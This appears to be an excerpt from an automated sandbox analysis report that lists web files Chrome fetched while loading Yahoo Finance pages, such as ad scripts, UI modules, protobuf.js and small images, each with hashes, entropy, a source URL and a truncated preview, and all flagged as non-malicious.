                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:ceUACPGrCB3Sxq4G23q0ADnDlk3JQyurOLEOexpPO84sKIoyAbS:J3MZOOpr+bS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6FAC50F91FE224BD891C2B203242D538
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:209864047E7618944FB8ECD5A9007C5E06F78740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:60FC78D0E736029ABAEEA5642D00000C2CB6C38E7B248C726D7753A5E71CA138
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:28D8AA07EA55A301725CC6F9523AAC9AA67768F8D91742FF1973D47BCA901332208AD96DBE1587995D8599BD7041240DEC85F9821747E76A0F934BA37AEE183D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"/22888152279/us/yfin/screen/dt/us_yfin_screen_dt_top_center":["html",1,null,null,1,1,1,0,0,null,null,1,1,[["ID=378cc44488856290:T=1728414967:RT=1728414967:S=ALNI_MZv3Rq25d7g_JHsk4w87CSO7d_uUg",1762110967,"/","yahoo.com",1],["UID=00000f31c5724371:T=1728414967:RT=1728414967:S=ALNI_MZE8ouMz4NQEcSb6Jo71cIBPIE9oQ",1762110967,"/","yahoo.com",2]],[138467550640],[6634125993],[5462617191],[3473808467],null,null,null,null,null,null,null,1,null,null,null,null,null,null,"AOrYGskztN_89gKUoJaJ2HWZBh0jqlieVOsso3d7Kzn2mtohbsbs62MdzHI5MZyhjn1LmcWFrsGzy1PPFPa49iCmTJU0-RVK-U362coDSn_flx5oDG_D","CPuMm8G__4gDFQ2IgwcdFKcM0A",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"2",null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,[["ID=bc808b86ae8e14e1:T=1728414967:RT=1728414967:S=AA-AfjY529hvw7lr-dwBIJTNZWxq",1743966967,"/","yahoo.com"]],[]]}.<!doctype html><html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):443334
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.362717320035016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:UrvhlOs6mzFal1/+66a2N0iRaQrfyuGSiG4E3WSZHDsHZQV9iCgXb/aItD7ZtbAC:Ur3tjK+j9pa4gJzD9qu9kUniHeZN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DA4EE02D000236C004B547C7991FD8E6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0F0A12409C58257688688295D97539CE64BDBB31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D25BC1FCA98C69A3636299640F99FC4C71C81B7A1EF6609374A2D8C04D758A37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1AD149F445A7917FEB218D9FFE93B7A8223AF5DF4B148E05555B4E9E41A59DDF1D4AD049D076F3CB247FCA914DD654A7FA7FCCFBA9C06963482E08413637E579
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://wnsrvbjmeprtfrnfx.ay.delivery/floorPrice/wnsrvBJmEPrTfrnFX/js/floorPrice/linreg.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:window.assertive=window.assertive||{};window.assertive.floorPriceVersion='11.9.1_8Tue_16';window.assertive.x771977720=(function(){var a=(function(){var a=[["(?<!motorola )Edge[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["EdgiOS[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["EdgA[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["Edg[ /](\\d+[\\.\\d]+)","Microsoft Edge"],[".*Servo.*Firefox(?:/(\\d+[\\.\\d]+))?","Firefox"],["(?!.*Opera[ /])Firefox(?:[ /](\\d+[\\.\\d]+))?","Firefox"],["(?:BonEcho|GranParadiso|Lorentz|Minefield|Namoroka|Shiretoko)[ /](\\d+[\\.\\d]+)","Firefox"],["CrMo(?:/(\\d+[\\.\\d]+))?","Chrome Mobile"],["Chrome(?:/(\\d+[\\.\\d]+))? Mobile","Chrome Mobile"],["Chrome(?!book)(?:/(\\d+[\\.\\d]+))?","Chrome"],["(?:(?:iPod|iPad|iPhone).+Version|MobileSafari)/(\\d+[\\.\\d]+)","Mobile Safari"],["(?:Version/(\\d+\\.[\\.\\d]+) .*)?Mobile.*Safari/","Mobile Safari"],["(?:iPod|(?<!Apple TV; U; CPU )iPhone|iPad)","Mobile Safari"],["Version/(\\d+\\.[\\.\\d]+) .*Safari/|(?:Safari|Safari(?:%20)?%E6%B5%8F%E8%
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2670)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):122888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.440233200848619
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:rwbsrHKnIyp5sjLWcgk27Zvzfi5m/OfzFu7R/p+pPRFOo0XifSOKfQ29j:N++WtiBQ/San5f5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5652DA563FF106C6A24852F92AB1D14C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:04F2F5DD2590CD7BF593D7E9B43B09BA7EF63146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:31D02F43DD0C7FC5C0D95DB087A23F1C2D729C93F10450884C8DA6B415F7839B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:31A0036F85A983F3F4C6036C074B90BD74216561EC69369F7789D1524A1B8E0A245C73D0D6ACFD5B61BC94069BB5108A25D477EB86898377F8F82199B398098A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){var DEPS_GRAPH={'enablermodule':[],'configurablemodule':['enablermodule'],'gdnmodule':['enablermodule'],'layoutsmodule':['enablermodule'],'videomodule':['enablermodule'],'layoutsfillermodule':['enablermodule','layoutsmodule'],'rad_ui_videomodule':['videomodule'],'$weak$':['configurablemodule','enablermodule','gdnmodule','layoutsfillermodule','layoutsmodule','rad_ui_videomodule','videomodule']};window.STUDIO_SDK_START=+new Date();/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var h,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)r
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (17320), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):17320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.756027257143914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:cCgBEbDATWo7pCz8qpI7/+fsQRBMUgyvDDqgMLGUGOCLYRIC1WZGb:cCgBz6o1CzXa7+fsQH/3nsXb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2FDF3E79D5E851201A0D52A886453D8B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0CCA49213DC761C62B82C185E3A7C597CBE47515
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:12B5EACCD8A9D81A6A12512566D2B72AA7C100B4A261A08EE6AAE4679A9E36B4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:42C03ECEAE90964D9A6DD5999ADC52E5A1899D549B71966881EC43CD3BAAA79A188A8E50212AE720B8C85C094EC06DB09461D7C4E349BD53E526811BC3C0979D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cdn.taboola.com/scripts/eid.es5.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:function _createForOfIteratorHelper(b,t){var e="undefined"!=typeof Symbol&&b[Symbol.iterator]||b["@@iterator"];if(!e){if(Array.isArray(b)||(e=_unsupportedIterableToArray(b))||t&&b&&"number"==typeof b.length){e&&(b=e);var c=0,m=function b(){};return{s:m,n:function t(){return c>=b.length?{done:!0}:{done:!1,value:b[c++]}},e:function b(t){throw t},f:m}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}var W=!0,d=!1,n;return{s:function t(){e=e.call(b)},n:function b(){var t=e.next();return W=t.done,t},e:function b(t){d=!0,n=t},f:function b(){try{W||null==e.return||e.return()}finally{if(d)throw n}}}}function _unsupportedIterableToArray(b,t){if(b){if("string"==typeof b)return _arrayLikeToArray(b,t);var e=Object.prototype.toString.call(b).slice(8,-1);return"Object"===e&&b.constructor&&(e=b.constructor.name),"Map"===e||"Set"===e?Array.from(b):"Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (12677), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12677
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.20916317837861
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:3iuQlq2TtwcbF6IlJ+Knosw+wTzW9LxXUJsb5vaU8ZW:Shl1bF6IlJ+Kf9dE8oU8ZW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DA320D39602C7372E993ED8CA6026A92
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E450CBC300424D62D5D40A0716345D0EA1A7DBD6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B28A31976C8BC8B8869AA7367D73636F8462F54A42EDD9EB00C28DCAF1FDD7C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F46A3F8A77CFF2E3C746DA437BF57EDA2997EFE1FE36B083AF076CD8F09160545C2C6D7A5AED521D89612F3815195EDAB8B0930112743E80FA9BAF1625F4C347
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-rapid",[],t):"object"==typeof exports?exports["wafer-rapid"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-rapid"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:C source, ASCII text, with very long lines (15779)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):15780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.489889126863118
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:Yg6ZEbDsBu9sgsZ+eGi1HgSXZsece2ZtuTYt5ZdV:YEbg49s/+e9H9JsVe2ZtiYt5Zb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FAF4A3C7686B850CB456C52A695DBEA6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:14F39FE35014F7C3214F10AB5185F1AA0D4FB4DF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:76EAB9BEAF784603010264DB6387F47202820153A05CE025D9DA6BD46933280B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:458D3010454ACBCB6D9AC9D19F2B25F57C7D43C57F3CBA2494D2465B90160B2930FE9DE93A14C651A93F0F50D41DBE1DBB9961AC144498F8CE56F5B3A34DA9A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as ie,e as z,d as I,f as A,i as S,q as w,N as T,k as N,n as V,X as ce,y as pe,A as Y,J as G,p as B,K as R,S as D,l as x,x as fe,o as be,P as _e,_ as U}from"./scheduler.Dr9AAxFe.js";import{S as he,i as ue,g as ye,a as J,e as we,t as F,c as ke,b as ve,m as Pe,d as Se}from"./index.DCSmZEjO.js";import{e as W}from"./each.BExQfwb4.js";import{g as H}from"./spread.CgU5AtxT.js";import{f as K,t as Ce,j as X}from"./Sparkline.svelte_svelte_type_style_lang.BXw0JgFc.js";import{g as de,h as Ee}from"./commonUtil.CI22_Irn.js";import{l as Ae}from"./loadSparkline.P-xwuGpq.js";function Oe(o,t,e){return(t=function(n){var r=function(s,l){if(typeof s!="object"||!s)return s;var c=s[Symbol.toPrimitive];if(c!==void 0){var h=c.call(s,l||"default");if(typeof h!="object")return h;throw new TypeError("@@toPrimitive must return a primitive value.")}return(l==="string"?String:Number)(s)}(n,"string");return typeof r=="symbol"?r:r+""}(t))in o?Object.defineProperty(o,t,{value:e,enumerable:!0,configurable:!0,wri
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pbs.yahoo.com/setuid?bidder=unruly&gdpr=0&gdpr_consent=&gpp=&gpp_sid=&f=i&uid=RX-c118506d-9030-46a7-842a-9ff348a698e2-003
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2694
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.791344395898635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:SthDm84FRtizw7MGo4cN1YbavuVvKHFnBcZ6gmenDr2PlMNyhm2qg:YkpFGMg9YuvuVvKHFn2obenDr6KKWg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6AD5509616A5FCA9F389801052BEA3FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5B53D204B7E6066409067FBA9FCE5202FF20E9D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6BECC3ABEA448B67731610708852A70C3CEB99059B2DEE98DA3711DC0620218A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:18729E5D7521224C032A2A7F18C154B1D02905DDA6A06DC3A1AF5D876BC5F651B78699589772CD6158BC1BFA75AEAD83B084BCA2B06539A3E4CC9B4A6D476DED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............PLTEGpL..U.....P..Q..?..U.....Q..P.....Q..P..Q..P..Q.....P..P..P..Q..P..Q..RU.U..Q..Q..Q..O..R..P..Q.....Q..R..R..Q..S..P..Q..R..R..T..P..P.....P..Q..P..Q..Q.....R..S..Q..U..Q..R..N..Q..P..M..Q..R..T..R..S..P..Q..P..S..Q..R..R..Q..Q..R..R..Rf.3f.f..P..Q..P..Q..R..P..R..R..Q..Q..Q..Q..Q..S..Q..P..Q.....Q.....S..T........R..W.....E..R..H..P..K..T..U..R..O.....R..I..F..S..N..T..W..W..J..Q..P..G..U..C..R.....J.....V..G..M..S.....W..X..L....T....q..V..U..R.......t..n....c..}....U..^..~..L..j.........a......r......`......Z....J...............F..........e...................\..h..`.......?...........................U.....x..=.....S..U....W.........T....I..W........|........i...s..S..........l..~.:..V.......................btRNS......................]...x.(...b..m.a.......?......k...*.)......,......w..A........A....k..^.d!......IDATX.W.XSW....K@.....p....{...{....E.....O.!.D......U.h.W.mc.......
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (14774)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):14775
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.46987156971267
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:B2rp1uabyuM98lHSL0s+j7GW/ePAxy2xT6U0b28TgtHy7LMV9l3c4b5:B2rp1uabyu3yL0s+/GW/+AxtxT6U0b2P
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1DEE7829A691AD67D3FF5D91136D299B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B6D5FC84E428C848F71E28F2D533791FAD6B235C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DDD06B85018DBCD8A4D0C177F6549245FC3BDD8E88CF227B0B2218FBEAE34EEC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C5FF97BB33077F8D832BFDF624CC573CB48747F62270BC32E53D1B152810A9FBA96569829D1A105637DB9F13353C0D73BF50D6F14E4B401AE34D6A6C69DD4B3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as ie,p as x,k as z,i as b,y as Se,c as H,e as R,d as N,f as O,F as Re,G as se,u as Q,g as J,a as K,v as Ne,q as E,x as Be,b as M,t as Oe,j as D,h as Te,_ as ce,l as P,m as Le,Q as Me,A as De,B as Fe,U as v,a4 as Ye,r as ue,V as ee,a0 as We}from"./scheduler.Dr9AAxFe.js";import{S as oe,i as ae,g as G,a as u,e as j,t as c,f as _e,c as T,b as q,m as A,d as B}from"./index.DCSmZEjO.js";import{U as qe,g as le,h as Ve,t as de,n as Ue}from"./commonUtil.CI22_Irn.js";import{F as Ge}from"./Footer.CIE1E9_0.js";import{L as Ae}from"./Lazy.DM9NzWSl.js";import{r as re}from"./resizeUtil.BFOdtaWL.js";import{A as je}from"./context.BGtg7DvY.js";import{e as me}from"./each.BExQfwb4.js";import{C as He}from"./close.C3ug6nNR.js";import{E as Qe}from"./error_outline.CkdKfkE_.js";import{I as te}from"./Icon.BSWt_jx8.js";import{q as ge,a as he}from"./index.C_UqkgE3.js";import{r as Je}from"./toast.AFLjoGRH.js";const Ke=s=>({}),be=s=>({resize:re,onResize:s[1]}),Xe=s=>({}),pe=s=>({resize:re,onResize:s[1]});fu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (20681)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):20920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.382951729807628
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:W4Oh1nYxEHnaDSA9O3gcXpe62Oaqz66VSwyKTWf6S6hYrJBq91D:Wtewg6dcOWyS66I
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:F4BA31A6A1D636440EB73ADA2C312201
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:92A49D852D46B7E66DB1679014C692589D9803D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:596842C18CBF89B94E83E196E6B2A68DC4899B568C4129E2930C00797B8CC65C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6ADB18F26D737F5AC85EE1D35757DA9352A859C6766D4CB345B500EDB3AFDD3589EE2696526BE1008AE65E0E08EC590459ECA2E85F1E652FA54336AD9BD4BBAF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*!. * protobuf.js v7.1.0 (c) 2016, daniel wirtz. * compiled thu, 22 sep 2022 17:16:11 utc. * licensed under the bsd-3-clause license. * see: https://github.com/dcodeio/protobuf.js for details. */.!function(d){"use strict";!function(r,u,t){var n=function t(n){var i=u[n];return i||r[n][0].call(i=u[n]={exports:{}},t,i,i.exports),i.exports}(t[0]);n.util.global.protobuf=n,"function"==typeof define&&define.amd&&define(["long"],function(t){return t&&t.isLong&&(n.util.Long=t,n.configure()),n}),"object"==typeof module&&module&&module.exports&&(module.exports=n)}({1:[function(t,n,i){n.exports=function(t,n){var i=Array(arguments.length-1),e=0,r=2,s=!0;for(;r<arguments.length;)i[e++]=arguments[r++];return new Promise(function(r,u){i[e]=function(t){if(s)if(s=!1,t)u(t);else{for(var n=Array(arguments.length-1),i=0;i<n.length;)n[i++]=arguments[i];r.apply(null,n)}};try{t.apply(n||null,i)}catch(t){s&&(s=!1,u(t))}})}},{}],2:[function(t,n,i){i.length=function(t){var n=t.length;if(!n)return 0;for(var i=0;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8356), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.15591255297827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:36umTu6tHB4ba+++/ERFSOqbFgTtuSd00u5L9r+AjKFZQTrq:31mi6BBSa+ZBbyRuSd00u5rK4rq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A9DF8E56A02208BEACF0DED260DD1D62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8F6AC2F62923D566B1C369DE93FB005A37EB6757
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:10A01F1F787157623EC546EC8105DBA5CAF08B5719667B91EA1449056254D7B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FB29746BF1C080FFA52DCA91E0B27757D604404B4E3753656980801FFCC6E8F3FFD5CDD6D4E1236F85F1BD47765D068EFB8C92DD44EF7BC2D8742DB8ED00D3A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-menu",[],t):"object"==typeof exports?exports["wafer-menu"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-menu"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var n={};return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,n){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (12433), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.202182615598781
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:3cmi6DAQ/946S4Y4+A09psvNYh8EhatYwQ:MTYxRY46psvNYh+Q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9EC69A2055C595F415EADE096A476B0D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:472B77037C2765E09666F43CCFBC01EF40783571
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F06D94CB6038F42F5C8D59D369AB21C3C54643A544B0824582CB00EBB61DFB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EC87EFA9D26546AD67D9CB65932AF47D8FBA77D0298E1567E2A11DB679BE045C761C3A6ADC131CC44BDBC7D95C522982FA9EE9F221155BB1FD2E38864E25EC3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-toggle-1.15.4-modern.js
